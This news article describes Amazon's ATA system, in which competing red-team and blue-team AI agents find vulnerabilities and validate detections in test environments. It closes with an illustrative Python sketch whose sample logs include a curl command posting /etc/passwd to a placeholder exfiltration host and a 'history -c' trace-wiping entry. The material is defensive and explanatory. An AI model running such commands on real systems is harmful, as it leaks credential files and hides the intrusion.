Tuesday, March 10, 2026

Amazon uses specialized AI agents for deep bug hunting


Generative artificial intelligence is accelerating software development, but it is also expanding the ability of cybercriminals to carry out financially motivated or state-backed intrusions. That means security teams at tech companies have more code to review than ever, while facing more pressure from bad actors. On Monday, Amazon will release details for the first time about an internal system known as Autonomous Threat Analysis (ATA), which the company uses to help its security teams proactively identify vulnerabilities on its platforms, perform variant analysis to quickly find other, similar flaws, and then develop remediation and detection capabilities to patch vulnerabilities before attackers find them.

ATA was born out of an internal Amazon hackathon in August 2024, and security team members say it has since become a key tool. The key concept behind ATA is that it is not a single AI agent designed to perform end-to-end security testing and threat analysis. Instead, Amazon has developed multiple specialized AI agents that compete against each other in two teams to quickly research real-world attack techniques and the different ways they can be used against Amazon systems, and then propose security checks for human review.

“The initial concept was intended to address a critical limitation in security testing – limited scope and the challenge of maintaining current detection capabilities in a rapidly changing threat landscape,” Steve Schmidt, Amazon’s chief security officer, tells WIRED. “Limited coverage means you can’t look at all the software or you can’t access all the applications because there just aren’t enough people. In this case, it’s great to analyze the software stack, but if the detection systems themselves aren’t kept up to date with changes in the threat landscape, you’re missing half the picture.”

To operate ATA at scale, Amazon has developed special “high-fidelity” test environments, deeply realistic representations of Amazon’s production systems, so that ATA can both ingest and generate real telemetry for analysis.

The company’s security teams also designed ATA so that every technique it uses and every detection capability it generates is validated against real-world, automated tests and system data. Red-team agents, which work to find attacks that could be used against Amazon systems, execute actual commands in special ATA test environments that generate verifiable logs. Blue-team, or defense-focused, agents use real telemetry to confirm whether their proposed security measures are effective. Whenever an agent develops a novel technique, it also produces timestamped logs to prove that its claims are correct.

Schmidt says this verifiability reduces false positives and acts as a “hallucination check.” Because the system is built to require certain standards of observable evidence, Schmidt argues that “hallucinations are architecturally impossible.”
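Amazon has not published ATA’s internals, but the evidence-gating idea described above, accepting a proposed detection only when it matches verifiable, timestamped telemetry, can be sketched in miniature. Everything below is hypothetical: the log fields, the rule, and the function names are illustrative assumptions, not Amazon’s actual system.

```python
from datetime import datetime

# Hypothetical log entries, standing in for the telemetry a red-team
# agent's command execution would produce in a test environment.
red_team_logs = [
    {"timestamp": "2026-03-09T14:02:11+00:00", "process": "curl",
     "args": "-d @/etc/passwd http://exfil.example"},
    {"timestamp": "2026-03-09T14:02:12+00:00", "process": "bash",
     "args": "-c 'history -c'"},
]

def detection_rule(entry):
    """Hypothetical blue-team rule: flag outbound posts of a sensitive file."""
    return entry["process"] == "curl" and "/etc/passwd" in entry["args"]

def validate_detection(rule, logs):
    """Accept a proposed detection only if it matches at least one
    timestamped log entry, i.e. there is observable evidence behind it."""
    hits = [entry for entry in logs if rule(entry)]
    for entry in hits:
        # Each cited timestamp must parse; a claim cannot rest on
        # evidence that cannot be checked.
        datetime.fromisoformat(entry["timestamp"])
    return len(hits) > 0

print(validate_detection(detection_rule, red_team_logs))  # True
```

The point of the sketch is the gate itself: a detection that matches no real log entry is rejected outright, which is the sense in which requiring observable evidence acts as a check on fabricated claims.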
